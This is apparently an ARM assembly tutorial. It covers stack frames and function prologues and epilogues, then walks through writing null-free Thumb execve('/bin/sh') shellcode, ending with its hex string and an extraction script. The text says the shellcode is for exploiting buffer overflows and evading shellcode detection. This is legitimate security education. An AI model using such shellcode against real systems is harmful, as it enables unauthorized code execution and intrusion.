    /* azeria@labs:~$ as stack.s -o stack.o && gcc stack.o -o stack && gdb stack */
    .global main
    
    main:
         mov   r0, #2  /* set up r0 */
         push  {r0}    /* save r0 onto the stack */
         mov   r0, #3  /* overwrite r0 */
         pop   {r0}    /* restore r0 to it's initial state */
         bx    lr      /* finish the program */

    At the beginning, the Stack Pointer points to address 0xbefff6f8 (could be different in your case), which represents the last item in the Stack. At this moment, we see that it stores some value (again, the value can be different in your case):

    gef> x/1x $sp
    0xbefff6f8: 0xb6fc7000

    After executing the first (MOV) instruction, nothing changes in terms of the Stack. When we execute the PUSH instruction, the following happens: first, the value of SP is decreased by 4 (4 bytes = 32 bits). Then, the contents of R0 are stored to the new address specified by SP. When we now examine the updated memory location referenced by SP, we see that a 32 bit value of integer 2 is stored at that location:

    gef> x/x $sp
    0xbefff6f4: 0x00000002

    The instruction (MOV r0, #3) in our example is used to simulate the corruption of the R0. We then use POP to restore a previously saved value of R0. So when the POP gets executed, the following happens: first, 32 bits of data are read from the memory location (0xbefff6f4) currently pointed by the address in SP. Then, the SP register’s value is increased by 4 (becomes 0xbefff6f8 again). The register R0 contains integer value 2 as a result.

    gef> info registers r0
    r0       0x2          2

    (Please note that the following gif shows the stack having the lower addresses at the top and the higher addresses at the bottom, rather than the other way around like in the first illustration of different Stack variations. The reason for this is to make it look like the Stack view you see in GDB)

    We will see that functions take advantage of Stack for saving local variables, preserving register state, etc. To keep everything organized, functions use Stack Frames, a localized memory portion within the stack which is dedicated for a specific function. A stack frame gets created in the prologue (more about this in the next section) of a function. The Frame Pointer (FP) is set to the bottom of the stack frame and then stack buffer for the Stack Frame is allocated. The stack frame (starting from it’s bottom) generally contains the return address (previous LR), previous Frame Pointer, any registers that need to be preserved, function parameters (in case the function accepts more than 4), local variables, etc. While the actual contents of the Stack Frame may vary, the ones outlined before are the most common. Finally, the Stack Frame gets destroyed during the epilogue of a function.

    Here is an abstract illustration of a Stack Frame within the stack:

    As a quick example of a Stack Frame visualization, let’s use this piece of code:

    /* azeria@labs:~$ gcc func.c -o func && gdb func */
    int main()
    {
     int res = 0;
     int a = 1;
     int b = 2;
     res = max(a, b);
     return res;
    }
    
    int max(int a,int b)
    {
     do_nothing();
     if(a<b)
     {
     return b;
     }
     else
     {
     return a;
     }
    }
    int do_nothing()
    {
     return 0;
    }

    In the screenshot below we can see a simple illustration of a Stack Frame through the perspective of GDB debugger.

    We can see in the picture above that currently we are about to leave the function max (see the arrow in the disassembly at the bottom). At this state, the FP (R11) points to 0xbefff254 which is the bottom of our Stack Frame. This address on the Stack (green addresses) stores 0x00010418 which is the return address (previous LR). 4 bytes above this (at 0xbefff250) we have a value 0xbefff26c, which is the address of a previous Frame Pointer. The 0x1 and 0x2 at addresses 0xbefff24c and 0xbefff248 are local variables which were used during the execution of the function max. So the Stack Frame which we just analyzed had only LR, FP and two local variables.

    FUNCTIONS

    To understand functions in ARM we first need to get familiar with the structural parts of a function, which are:

    1. Prologue
    2. Body
    3. Epilogue

    The purpose of the prologue is to save the previous state of the program (by storing values of LR and R11 onto the Stack) and set up the Stack for the local variables of the function. While the implementation of the prologue may differ depending on a compiler that was used, generally this is done by using PUSH/ADD/SUB instructions. An example of a prologue would look like this:

    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack. This also allocates space for the Stack Frame */

    The body part of the function is usually responsible for some kind of unique and specific task. This part of the function may contain various instructions, branches (jumps) to other functions, etc. An example of a body section of a function can be as simple as the following few instructions:

    mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the function max */
    mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the function max */
    bl     max          /* Calling/branching to function max */

    The sample code above shows a snippet of a function which sets up local variables and then branches to another function. This piece of code also shows us that the parameters of a function (in this case function max) are passed via registers. In some cases, when there are more than 4 parameters to be passed, we would additionally use the Stack to store the remaining parameters. It is also worth mentioning, that a result of a function is returned via the register R0. So what ever the result of a function (max) turns out to be, we should be able to pick it up from the register R0 right after the return from the function. One more thing to point out is that in certain situations the result might be 64 bits in length (exceeds the size of a 32bit register). In that case we can use R0 combined with R1 to return a 64 bit result.

    The last part of the function, the epilogue, is used to restore the program’s state to it’s initial one (before the function call) so that it can continue from where it left of. For that we need to readjust the Stack Pointer. This is done by using the Frame Pointer register (R11) as a reference and performing add or sub operation. Once we readjust the Stack Pointer, we restore the previously (in prologue) saved register values by poping them from the Stack into respective registers. Depending on the function type, the POP instruction might be the final instruction of the epilogue. However, it might be that after restoring the register values we use BX instruction for leaving the function. An example of an epilogue looks like this:

    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame Pointer from the Stack, jumping to previously saved LR via direct load into PC. The Stack Frame of a function is finally destroyed at this step. */

    So now we know, that:

    1. Prologue sets up the environment for the function;
    2. Body implements the function’s logic and stores result to R0;
    3. Epilogue restores the state so that the program can resume from where it left of before calling the function.

    Another key point to know about the functions is their types: leaf and non-leaf. The leaf function is a kind of a function which does not call/branch to another function from itself. A non-leaf function is a kind of a function which in addition to it’s own logic’s does call/branch to another function. The implementation of these two kind of functions are similar. However, they have some differences. To analyze the differences of these functions we will use the following piece of code:

    /* azeria@labs:~$ as func.s -o func.o && gcc func.o -o func && gdb func */
    .global main
    
    main:
    	push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    	mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    	mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    	bl     max          /* Calling/branching to function max */
    	sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */
    
    max:
    	push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */
    	cmp    r0, r1       /* Implementation of if(a<b) */
    	movlt  r0, r1       /* if r0 was lower than r1, store r1 into r0 */
    	add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11}        /* restoring frame pointer */
    	bx     lr           /* End of the epilogue. Jumping back to main via LR register */

    The example above contains two functions: main, which is a non-leaf function, and max – a leaf function. As mentioned before, the non-leaf function calls/branches to another function, which is true in our case, because we branch to a function max from the function main. The function max in this case does not branch to another function within it’s body part, which makes it a leaf function.

    Another key difference is the way the prologues and epilogues are implemented. The following example shows a comparison of prologues of a non-leaf and leaf functions:

    /* A prologue of a non-leaf function */
    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    
    /* A prologue of a leaf function */
    push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */

    The main difference here is that the entry of the prologue in the non-leaf function saves more register’s onto the stack. The reason behind this is that by the nature of the non-leaf function, the LR gets modified during the execution of such a function and therefore the value of this register needs to be preserved so that it can be restored later. Generally, the prologue could save even more registers if it’s necessary.

    The comparison of the epilogues of the leaf and non-leaf functions, which we see below, shows us that the program’s flow is controlled in different ways: by branching to an address stored in the LR register in the leaf function’s case and by direct POP to PC register in the non-leaf function.

     /* An epilogue of a leaf function */
    add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11}        /* restoring frame pointer */
    bx     lr           /* End of the epilogue. Jumping back to main via LR register */
    
    /* An epilogue of a non-leaf function */
    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

    Finally, it is important to understand the use of BL and BX instructions here. In our example, we branched to a leaf function by using a BL instruction. We use the the label of a function as a parameter to initiate branching. During the compilation process, the label gets replaced with a memory address. Before jumping to that location, the address of the next instruction is saved (linked) to the LR register so that we can return back to where we left off when the function max is finished.

    The BX instruction, which is used to leave the leaf function, takes LR register as a parameter. As mentioned earlier, before jumping to function max the BL instruction saved the address of the next instruction of the function main into the LR register. Due to the fact that the leaf function is not supposed to change the value of the LR register during it’s execution, this register can be now used to return to the parent (main) function. As explained in the previous chapter, the BX instruction  can eXchange between the ARM/Thumb modes during branching operation. In this case, it is done by inspecting the last bit of the LR register: if the bit is set to 1, the CPU will change (or keep) the mode to thumb, if it’s set to 0, the mode will be changed (or kept) to ARM. This is a nice design feature which allows to call functions from different modes.

    To take another perspective into functions and their internals we can examine the following animation which illustrates the inner workings of non-leaf and leaf functions.

FURTHER READING

1. Whirlwind Tour of ARM Assembly.
https://www.coranac.com/tonc/text/asm.htm

2. ARM assembler in Raspberry Pi.
http://thinkingeek.com/arm-assembler-raspberry-pi/

3. Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation by Bruce Dang, Alexandre Gazet, Elias Bachaalany and Sebastien Josse.

4. ARM Reference Manual.
http://infocenter.arm.com/help/topic/com.arm.doc.dui0068b/index.html

5. Assembler User Guide.
http://www.keil.com/support/man/docs/armasm/default.htm

WRITING ARM SHELLCODE

INTRODUCTION TO WRITING ARM SHELLCODE

 

This tutorial is for people who think beyond running automated shellcode generators and want to learn how to write shellcode in ARM assembly themselves. After all, knowing how it works under the hood and having full control over the result is much more fun than simply running a tool, isn’t it? Writing your own shellcode in assembly is a skill that can turn out to be very useful in scenarios where you need to bypass shellcode-detection algorithms or other restrictions where automated tools could turn out to be insufficient. The good news is, it’s a skill that can be learned quite easily once you are familiar with the process.

For this tutorial we will use the following tools (most of them should be installed by default on your Linux distribution):

  • GDB – our debugger of choice
  • GEF –  GDB Enhanced Features, highly recommended (created by @_hugsy_)
  • GCC – Gnu Compiler Collection
  • as – assembler
  • ld – linker
  • strace – utility to trace system calls
  • objdump – to check for null-bytes in the disassembly
  • objcopy – to extract raw shellcode from ELF binary

Make sure you compile and run all the examples in this tutorial in an ARM environment.

Before you start writing your shellcode, make sure you are aware of some basic principles, such as:

  1. You want your shellcode to be compact and free of null-bytes
    • Reason: We are writing shellcode that we will use to exploit memory corruption vulnerabilities like buffer overflows. Some buffer overflows occur because of the use of the C function ‘strcpy’. Its job is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work.
  2. You also want to avoid library calls and absolute memory addresses
    • Reason: To make our shellcode as universal as possible, we can’t rely on library calls that require specific dependencies and absolute memory addresses that depend on specific environments.

The Process of writing shellcode involves the following steps:

  1. Knowing what system calls you want to use
  2. Figuring out the syscall number and the parameters your chosen syscall function requires
  3. De-Nullifying your shellcode
  4. Converting your shellcode into a Hex string
UNDERSTANDING SYSTEM FUNCTIONS

Before diving into our first shellcode, let’s write a simple ARM assembly program that outputs a string. The first step is to look up the system call we want to use, which in this case is “write”. The prototype of this system call can be looked up in the Linux man pages:

ssize_t write(int fd, const void *buf, size_t count);

From the perspective of a high level programming language like C, the invocation of this system call would look like the following:

const char string[13] = "Azeria Labs\n";
write(1, string, sizeof(string));        // Here sizeof(string) is 13

Looking at this prototype, we can see that we need the following parameters:

  • fd – 1 for STDOUT
  • buf – pointer to a string
  • count – number of bytes to write -> 13
  • syscall number of write -> 0x4

For the first 3 parameters we can use R0, R1, and R2. For the syscall we need to use R7 and move the number 0x4 into it.

mov   r0, #1      @ fd 1 = STDOUT
ldr   r1, string  @ loading the string from memory to R1
mov   r2, #13     @ write 13 bytes to STDOUT 
mov   r7, #4      @ Syscall 0x4 = write()
svc   #0

Using the snippet above, a functional ARM assembly program would look like the following:

.data
string: .asciz "Azeria Labs\n"  @ .asciz adds a null-byte to the end of the string
after_string:
.set size_of_string, after_string - string

.text
.global _start

_start:
   mov r0, #1               @ STDOUT
   ldr r1, addr_of_string   @ memory address of string
   mov r2, #size_of_string  @ size of string
   mov r7, #4               @ write syscall
   swi #0                   @ invoke syscall

_exit:
   mov r7, #1               @ exit syscall
   swi 0                    @ invoke syscall

addr_of_string: .word string

In the data section we calculate the size of our string by subtracting the address at the beginning of the string from the address after the string. This, of course, is not necessary if we would just calculate the string size manually and put the result directly into R2. To exit our program we use the system call exit() which has the syscall number 1.

Compile and execute:

azeria@labs:~$ as write.s -o write.o && ld write.o -o write
azeria@labs:~$ ./write
Azeria Labs

Cool. Now that we know the process, let’s look into it in more detail and write our first simple shellcode in ARM assembly.

1. TRACING SYSTEM CALLS

For our first example we will take the following simple function and transform it into ARM assembly:

#include <stdio.h>

void main(void)
{
    system("/bin/sh");
}

The first step is to figure out what system calls this function invokes and what parameters are required by the system call. With ‘strace’ we can monitor our program’s system calls to the Kernel of the OS.

Save the code above in a file and compile it before running the strace command on it.

azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
-f -- follow forks, -ff -- with output into separate files
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
--- snip --
azeria@labs:~$ strace -f -v system
--- snip --
[pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi", "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1", "OLDPWD=/home/azeria", "HOME=/home/azeria", "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1", "LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm", "PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8", "LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash", "EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8", "PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) = 0
--- snip --
[pid 4575] write(2, "$ ", 2$ ) = 2
[pid 4575] read(0, exit
--- snip --
exit_group(0) = ?
+++ exited with 0 +++

Turns out, the system function execve() is being invoked.

2. SYSCALL NUMBER AND PARAMETERS

The next step is to figure out the syscall number of execve() and the parameters this function requires. You can get a nice overview of system calls at w3calls or by searching through Linux man pages. Here’s what we get from the man page of execve():

NAME
    execve - execute program
SYNOPSIS

    #include <unistd.h>

    int  execve(const char *filename, char *const argv [], char *const envp[]);

The parameters execve() requires are:

  • Pointer to a string specifying the path to a binary
  • argv[] – array of command line variables
  • envp[] – array of environment variables

Which basically translates to: execve(*filename, *argv[], *envp[]) –> execve(*filename, 0, 0). The system call number of this function can be looked up with the following command:

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h 
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

Looking at the output you can see that the syscall number of execve() is 11. Register R0 to R2 can be used for the function parameters and register R7 will store the syscall number.

Invoking system calls on x86 works as follows: First, you PUSH parameters on the stack. Then, the syscall number gets moved into EAX (MOV EAX, syscall_number). And lastly, you invoke the system call with SYSENTER / INT 80.

On ARM, syscall invocation works a little bit differently:

  1. Move parameters into registers – R0, R1, ..
  2. Move the syscall number into register R7
    • mov  r7, #<syscall_number>
  3. Invoke the system call with
    • SVC #0 or
    • SVC #1
  4. The return value ends up in R0

This is how it looks like in ARM Assembly (Code uploaded to the azeria-labs Github account):

As you can see in the picture above, we start with pointing R0 to our “/bin/sh” string by using PC-relative addressing (If you can’t remember why the effective PC starts two instructions ahead of the current one, go to ‘‘Data Types and Registers‘ of the assembly basics tutorial and look at part where the PC register is explained along with an example). Then we move 0’s into R1 and R2 and move the syscall number 11 into R7. Looks easy, right? Let’s look at the disassembly of our first attempt using objdump:

azeria@labs:~$ as execve1.s -o execve1.o
azeria@labs:~$ objdump -d execve1.o
execve1.o: file format elf32-littlearm

Disassembly of section .text:

00000000 <_start>:
 0: e28f000c add r0, pc, #12
 4: e3a01000 mov r1, #0
 8: e3a02000 mov r2, #0
 c: e3a0700b mov r7, #11
 10: ef000000 svc 0x00000000
 14: 6e69622f .word 0x6e69622f
 18: 0068732f .word 0x0068732f

Turns out we have quite a lot of null-bytes in our shellcode. The next step is to de-nullify the shellcode and replace all operations that involve.

3. DE-NULLIFYING SHELLCODE

One of the techniques we can use to make null-bytes less likely to appear in our shellcode is to use Thumb mode. Using Thumb mode decreases the chances of having null-bytes, because Thumb instructions are 2 bytes long instead of 4. If you went through the ARM Assembly Basics tutorials you know how to switch from ARM to Thumb mode. If you haven’t I encourage you to read the chapter about the branching instructions “B / BX / BLX” in part 6 of the tutorial “Conditional Execution and Branching“.

In our second attempt we use Thumb mode and replace the operations containing #0’s with operations that result in 0’s by subtracting registers from each other or xor’ing them. For example, instead of using “mov  r1, #0”, use either “sub  r1, r1, r1” (r1 = r1 – r1) or “eor  r1, r1, r1” (r1 = r1 xor r1). Keep in mind that since we are now using Thumb mode (2 byte instructions) and our code must be 4 byte aligned, we need to add a NOP at the end (e.g. mov  r5, r5).

(Code available on the azeria-labs Github account):

The disassembled code looks like the following:

The result is that we only have one single null-byte that we need to get rid of. The part of our code that’s causing the null-byte is the null-terminated string “/bin/sh\0”. We can solve this issue with the following technique:

  • Replace “/bin/sh\0” with “/bin/shX”
  • Use the instruction strb (store byte) in combination with an existing zero-filled register to replace X with a null-byte

(Code available on the azeria-labs Github account):

Voilà – no null-bytes!

4. TRANSFORM SHELLCODE INTO HEX STRING

The shellcode we created can now be transformed into it’s hexadecimal representation. Before doing that, it is a good idea to check if the shellcode works as a standalone. But there’s a problem: if we compile our assembly file like we would normally do, it won’t work. The reason for this is that we use the strb operation to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

azeria@labs:~$ ld --help
--- snip --
-N, --omagic        Do not page align data, do not make text readonly.
--- snip -- 
azeria@labs:~$ as execve3.s -o execve3.o && ld -N execve3.o -o execve3
azeria@labs:~$ ./execve3
$ whoami
azeria

It works! Congratulations, you’ve written your first shellcode in ARM assembly.

To convert it into hex, use the following commands:

azeria@labs:~$ objcopy -O binary execve3 execve3.bin 
azeria@labs:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve3.bin 
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

Instead of using the hexdump command above, you also do the same with a simple python script:

#!/usr/bin/env python

import sys

binary = open(sys.argv[1],'rb')

for byte in binary.read():
 sys.stdout.write("\\x"+byte.encode("hex"))

print ""
azeria@labs:~$ ./shellcode.py execve3.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

I hope you enjoyed this introduction into writing ARM shellcode. In the next part you will learn how to write shellcode in form of a reverse-shell, which is a little bit more complicated than the example above. After that we will dive into memory corruptions and learn how they occur and how to exploit them using our self-made shellcode.